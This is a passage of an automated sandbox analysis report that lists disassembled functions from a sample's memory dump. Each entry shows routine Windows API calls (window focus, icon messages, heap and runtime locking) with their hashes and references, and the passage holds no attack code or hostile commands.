
APIs

SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25

Function 00416D50 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
GetFocus.USER32 ref: 00416DD9
IsChild.USER32(?,00000000), ref: 00416DE3
GetWindow.USER32(?,00000005), ref: 00416DF2
SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Focus$ChildWindow
String ID:
API String ID: 501040988-0
Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65

Function 00423CD9 Relevance: 7.6, APIs: 5, Instructions: 68memorylibraryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
HeapFree.KERNEL32(00000000), ref: 00423D76

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID:
API String ID: 354369530-0
Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68

Function 00411E98 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(?,?), ref: 00411EA9
GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58

Function 0042BBDE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042BBEA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__amsg_exit.LIBCMT ref: 0042BC0A
__lock.LIBCMT ref: 0042BC1A
InterlockedDecrement.KERNEL32(?), ref: 0042BC37
InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD

Function 0042592A Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00425948

Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2

___sbh_find_block.LIBCMT ref: 00425953
___sbh_free_block.LIBCMT ref: 00425962
HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D

Function 0040F626 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29

Function 0040F841 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F476 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D

Function 0040F42E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D

Function 0040F8DD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F889 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D

Function 0040F4BE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D

Function 0040F54E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D

Function 0040F96D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D

Function 0040F506 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D

Function 0040F925 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F5DE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D

Function 0040F9FD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D

Function 0040F596 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D

Function 0040F9B5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D

Function 0040FA45 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D

Function 0040F27B Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000172), ref: 0040F288
SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D

Function 0040F2C6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
